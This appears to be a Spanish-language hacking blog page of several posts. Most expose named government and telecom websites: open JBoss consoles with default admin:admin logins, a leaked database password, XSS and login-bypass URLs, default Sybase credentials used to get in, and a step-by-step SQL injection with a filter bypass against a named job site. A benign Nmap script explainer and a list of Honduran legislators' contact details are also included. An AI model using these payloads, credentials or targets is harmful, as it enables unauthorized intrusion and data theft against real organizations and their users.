[Research] J-Boss sin login y accesos default en entidades gubernamentales (Peru, Mexico, Ecuador, El Salvador , India y Colombia)

Este sera un post mixto pero entorno a un mismo tema. Muchas empresas y entes gubernamentales en todo el mundo sufren de este mal.

Utilizan JBoss (es un servidor de aplicaciones J2EE de código abierto implementado en Java puro) y por X o Y motivo lo dejan con acceso directo sin ningún tipo de autenticacion a la consola web y/o jmx-console.
La Ventaja de JBoss es que puede ser utilizado en cualquier sistema operativo para el que esté disponible Java.

Pero que es JMX?
JBoss implementa JMX en su microkernel. El propio servidor dispone de un una consola JMX accesible por la URL http://ipservidor:puerto/jmx-console que muestra los MBeans públicos accesibles por ella o programáticamente por código Java.

Ejemplos:
http://pnww.mimdes.gob.pe/jmx-console/

http://qasistemas2.edomex.gob.mx/jmx-console/

http://sigpro.conelec.gob.ec/jmx-console/

http://sist.mag.gob.sv/jmx-console/

http://aplicaciones.emmopq.gov.ec/jmx-console/


Algunas acciones útiles:

• Mostrar el árbol JNDI
• Forzar un volcado de memoria
• Mostrar el uso del pool de memoria
• Gestionar el escáner de despliegues
• Redesplegar una aplicación
• Acceder a la base de datos Hypersonic
• Detener JBoss
• Conocer estado de los EJB desplegados e instanciados

Web-console acceso directo y con datos default:

El Jboss Web Console (http://ipservidor:puerto/web-console/) muestra también la consola JMX en jerarquía de árbol.

Ejemplo:

http://pnww.mimdes.gob.pe/web-console/

http://qasistemas2.edomex.gob.mx/web-console/

http://sigpro.conelec.gob.ec/web-console/

http://sist.mag.gob.sv/web-console/

http://eforms.gov.in/web-console/

admin:admin

https://tigoonline.tigo.com.co/web-console/ (Digamos que estas es la parte 2 de Tigo)

admin:admin

Hasta la PROXYma.

Read more »

Entendiendo el funcionamiento de un script de Nmap

En este post intentare ilustrar el funcionamiento de un script básico de Nmap, para ser específicos el http-enum, que es muy utilizado para enumerar directorios y/o aplicaciones populares que estén presentes en un servidor web.

Primero buscamos el script que debería de estar localizado en la carpeta de instalacion de Nmap dentro del directorio scripts.

Encontramos el script y lo abrimos con nuestro editor preferido (a los Winusers les recomiendo Notepad++):
En la primera linea de código nos encontramos con la descripción del código donde nos explica detalladamente lo que hace el script.

Datos generales

Un script de Nmap se compone en diferentes secciones y no todas son obligatorias o necesarias:


Cabecera.

• id  : nombre del script que se muestra en la salida Nmap.
• description : descripción del script, notas.
• author : autor del script.
• categories :  categoría del script
• license : licencia
• dependencies :  Estos son otros scripts que se requieren incluir para el funcionamiento.

Funciones.

portrule / hostrule Datos para decidir si se cumple y ejecuta el script. Los datos pueden ser host y/o port.
action (acción) este es digamos el cuerpo del script donde se encuentra las acciones que realizara el propio script.

Veamos el Codigo del script:

En las lineas 71 y 73 encontramos las extensiones de archivos que busca el script, y aqui es donde nosotros podemos agregar las extensiones que creamos necesarias a nuestro gusto.

En la linea 337 comienza el "action" del script y en las siguientes lineas lee los argumentos que nosotros enviamos cuando ejecutamos nmap y llamamos al script, si es que los enviamos, pero la linea que nos debe llamar la atención es la 343 donde encontramos esto:

local fingerprint_file = stdnse.get_script_args({'http-enum.fingerprintfile', 'fingerprints'}) or 'http-fingerprints.lua'

Se le asigna a la variable fingerprint_file el nombre del archivo http-fingerprints.lua el cual se encuentra en la carpeta nselib/data/ en la instalacion del Nmap.

La linea 349:
local status, fingerprints = get_fingerprints(fingerprint_file, category)

Llama a la funcion get_fingerprints y le envía como parametro el nombre del archivo y la categoria.
El codigo de esta funcion esta en la linea 157 y es donde encontramos el funcionamiento de la misma, que lee las url que estan en el archivo http-fingerprints.lua de acuerdo a la categoría que ingresamos como parámetro.

Y una vez el script cuenta con esta información procede a probar con las url's obtenidas del http-fingerprints.lua y obtener los codigos 404 o 200 o 403 respectivamente si encuentra o no las rutas y/o archivos.

Es por eso que podemos llamar al script http-enum de la siguiente manera:

nmap -p 80,443 -A -v --script http-enums --script-args http-enum.category=management IPdelAMIGO

Si se fijan en el archivo http-fingerprints.lua en la linea 712 en la función table.insert lleva como parametro category=management y de esta manera pueden ver las demás categorias que incluye el script y agregar nuevas rutas que tengamos en nuestros diccionarios.

Hasta la PROXYma.

Read more »

[Hack] Exposed Tigo Honduras, Guatemala, Bolivia, Paraguay, Colombia [1ra Parte]

Bueno esto digamos que fue debido a un SMS que me llego de esta compañía cuando estaba en lo mejor de mi sueño en la madrugada.

Comencemos con los hallazgos:

 http://www2.tigo.com.hn/XML/
http://www2.tigo.com.hn/XML/backend.xml
http://www2.tigo.com.hn/XML/cobranzas.xml
y asi sucesivamente...

En donde encontramos cosas interesantes como esta:

<DATABASE host="localhost" username="telefonoscom" password="teleCOMcel2i" name="hn_tigo" port="5432" type="postgreSQL">

Y ademas de esos muuuuchas tablas como para enriquecer nuestro diccionario.

Así como también podemos echar un vistazo por acá:

http://www2.tigo.com.co/XML/

Aquí hay de todos los sabores un XSS en el wap de Tigo Guatemala: 

 http://wap.tigo.com.gt:8080/backtones/back_suscribeback.jsp?CC=504%3Ch1%3Ehola%20amiguitos!

Viajemos hasta Paraguay donde encontramos un hermoso iSql en el form de login:

http://promo.tigo.com.py/consulta-gerente/admin/login.php

Pero hey! lo olvidaba regresemos a Guatemala:

En el siguiente login, pueden probar con varios usuarios y password pero lo interesante es que si colocal ' en user y password tambien ' luego ingresar y ups! ingresaron? yeaaah!

http://wap.tigo.com.gt:8080/backtones/Login.jsp

En Honduras también son muy generosos y nos regalan algunos datos:

http://wap.tigo.com.hn/sm/test.txt

Hey pero que tal si me regalan un path aunque sea no?..ok aquí esta:

http://www.tigo.com.hn/seccion/noticias-de-agosto

En Colombia nos tienen a la vista de todo mundo esto:

https://tigoonline.tigo.com.co/GestionPqrOnLineWEB/pages/inicio.jsf

Esperen la 2da y 3ra Parte!

Hasta la PROXYma!

Read more »

[HACK] Exposed Ministerio de Justicia de Perú

Bueno todo comenzó porque estaba leyendo algo sobre webservice con SYBASE y dije bueno que tal si me armo un dork sencillo?, sera que nos muestra algo nuestro amo y señor Google? entonces fue que arme el siguiente Dork:

intext:EAServer 5.5 site:*.gob.*

Obteniendo como resultado lo siguiente:

Veamos que hay en este dominio:

http://sistemas2.minjus.gob.pe/

Intrigante no?, bueno por lo general este tipo de servidores tienen una interfaz web de administración, en este caso tenemos varias opciones, yo probe buscar la webconsole con google y no obtuve resultados positivos, intente con Dirbuster y que creen? taraaan:

Aquí es donde digo hubiera probado poner eso en la url antes! jejeje.

Pero entramos y nos aparece el login donde nos pide que pongamos el usuario y el password.

En resumidas cuentas logre loguearme :

Adivinen como? si asi... con los datos de acceso del usuario por default que trae este sistema.

Sybase EAServer Default Account 'jagadmin'

Hasta la PROXYma.

Read more »

[Hack] Exposed iSQL signupgetajob.com Honduras

En este caso lo que me llama la atención como estas empresas contratan servicios de desarrollo web sin hacer ningún tipo de test de calidad mucho menos en seguridad de lo que contratan y por lo que pagan.

Esta web la mire en algunos diarios del país para subir el currículo y poder ser candidato a empleo en alguna de las empresas que se muestran ahí.

Pero esta vez ingrese porque vi que lo recomiendan en un sitio de una universidad, y dije...echare un vistazo un rato nomas jejeje.

A ingresar en www.signupgetajob.com lo que verán sera lo siguiente
Dentro de "Current Job Openings" hay 3 opciones y lo que me llamo la atención fue el link que tienen (Encerrados en verde en la imagen)
algo asi: http://infosistemas.hn3.net/signup/jobs.php?cod=10
Al dar click en el, abre el contenido en un iframe, entonces mejor lo abrimos en una perstaña nueva.

Y si seguimos con ese mismo link y le agregamos el comodin magico, obtendremos nuestro aclamado error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

http://infosistemas.hn3.net/signup/jobs.php?cod=10'

Ok, desde ya estamos seguros que tiene iSQL, pero con que nos toparemos despues, no lo sabemos, solo hay una manera de averiguarlo! asi que manos a la obra.

Entonces comenzamos a buscar la cantidad de columnas asi:

http://infosistemas.hn3.net/signup/jobs.php?cod=10%20ORDER%20BY%208--

Si colocamos 9 en lugar de 8 salta el error así que el numero que buscamos es 8.

Seguimos, y preparamos el SELECT asi:

http://infosistemas.hn3.net/signup/jobs.php?cod=10%20UNION%20SELECT%201,2,3,4,5,6,7,8--

Pero, Oh Rayos!!, estos individuos tienen filtro para iSql!!!! nooooo!!!, pues no salta el siguiente error.

Forbidden

You don't have permission to access /signup/jobs.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Y hasta aqui llega el articulo pensaran ustedes.... Pues no, no nos daremos por vencidos tan facilmente! sudemos un poco! jajaja

Tratemos un bypass a ese filtro:

El Select que inyectamos anterior mente es este:
http://infosistemas.hn3.net/signup/jobs.php?cod=10 UNION SELECT 1,2,3,4,5,6,7,8--

Ahora engañemos al filtro asi:
http://infosistemas.hn3.net/signup/jobs.php?cod=10+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8--

y ahí obtenemos nuestros numeritos mágicos.

Con los cuales podemos sacar algo como esto:

http://infosistemas.hn3.net/signup/jobs.php?cod=10%20/*!UNION*/%20/*!SELECT*/%201,2,3,4,5,table_name,7,8+from+/*!information_schema*/.tables+LIMIT%2033,1--


Hasta la PROXYma.

Read more »

(Actualizado 1 Parte ) Indignados? acá les dejo los email de algunos diputados y las junta directiva del Congreso de Honduras

Si tenemos malestar con respecto a las ultimas decisiones tomadas en el congreso nacional de Honduras, o si estas indignado, que tal si nos unimos y enviamos correos a todos los políticos.
Por nosotros están ahí, que hagan caso a nuestro clamor


Acá el link que genera el correo con las direcciones agregadas, para que les haga mas fácil enviarlo a todos.
Click aquí

Otras direcciones



Presupuesto2012@congresonacional.hn
direcciondeprensa@presidencia.gob.hn
diseloalpresidente@presidencia.gob.hn
info@congreso.gob.hn
atencionalpublico@gobernacion.gob.hn

(Actualizado I Parte)
Direcciones de Facebook y/o Twitter de algunos diputados.



Rodolfo Irias Navas
http://www.facebook.com/RodolfoIriasNavasOficial

 José María Martínez
http://www.facebook.com/profile.php?id=1172382394&ref=ts

Olman Danery Maldonado Rubio
http://www.facebook.com/profile.php?id=100001724149750

Maria Bertilia Zepeda

http://www.facebook.com/profile.php?id=100002365166610

Maylo Wood

http://www.facebook.com/profile.php?id=100002120388983

 Yesenia Zelay
http://www.facebook.com/profile.php?id=100000869917098

Rigoberto Chang
http://www.facebook.com/profile.php?id=100000368913559&ref=ts

Juan Fernando Lobo
http://www.facebook.com/pages/Juan-Fernando-Lobo/147648728630092
@JUANFERLOBO

 Gladis López
http://www.facebook.com/profile.php?id=100001531676114

 Juan Carlos Valenzuela
http://www.facebook.com/profile.php?id=100000508509458

 Donaldo Ernesto Reyes
http://www.facebook.com/profile.php?id=100001411460145



Agregando mas... (Pendientes de actualización)



Junta directiva del Congreso Nacional de Honduras


Juan Orlando Hernández Alvarado
Presidente
presidencia@congreso.gob.hn

Lena Karyn Gutiérrez Arevalo
Vice-Presidente
lenagutierrez@congreso.gob.hn

Victoria Carrasco García
Vice-Presidente Alterno
vitoriacarrasco@congreso.gob.hn

Marlon Guillermo Lara Orellana
Vide-Presidente
marlonlara@congreso.gob.hn

Rigoberto Chang Castillo
Secretario
rigobertochang@congreso.gob.hn

Juan Ramón Velásquez Nazar
Vice-Presidente
juanvelasquez@congreso.gob.hn


Gladis Aurora López Calderón
Secretario
gladyslopez@congreso.gob.hn

Marvin Ponce Sauceda
Vide-presidente
marvinponce@congreso.gob.hn

Angel Darío Banegas Leiva
Secretarios Alterno
angelbanegas@congreso.gob.hn

Martha Concepción Figueroa Torrez
Vice-Presidente


Mílton Jesús Puerto Oseguera
Secretario Alterno
miltonpuerto@congreso.gob.hn

Alba Nora Gúnera Osorio
Vice-presidente
albagunera@congreso.gob.hn

Eliseo Noel Mejía Castillo
Pro-ecretario
eliseomejia@congreso.gob.hn

Oscar Orlando Burgos
Vice-presidente Alterno
oscarburgos@congreso.gob.hn

Jariet Waldina Paz
Pro-secretario
jarieywaldina@congreso.gob.hn

Sigue la lista de correos


Diputados Liberales

José Alfredo Saavedra Paz
marcio.vega@congresonacional.hn

Marcia Villeda
marcia.villeda@congresonacional.hn
@mfvilleda


Fredy Najera
fredy.najera@congresonacional.hn

Margarita Dabdoub Sikaffi
margarita.sikaffi@congresonacional.hn

Maria Bertilia Zepeda
maria.zepeda@congresonacional.hn

Perla Simons Morales
perla.simons@congresonacional.hn


Valentin Suarez Osejo
valentin.suarez@congresonacional.hn

José Simón Azcona Bocock
jose.azcona@congresonacional.hn

Carlos Alfredo Lara Watson
carlos.lara@congresonacional.hn


Diputados Nacionalistas

José Celín Discua
jdiscua@congresonacional.hn

Diputados Unificación Democrática
Edwin Pavón
epavon@congresonacional.hn



Diputados PINU
Edgardo Leitzelar
gleitzelar@congresonacional.hn

José Toribio Aguilera
jose.aguilar@congresonacional.hn


Diputados Partido DC
Juan Ramón Velasquez
juan.velasquez@congresonacional.hn

Read more »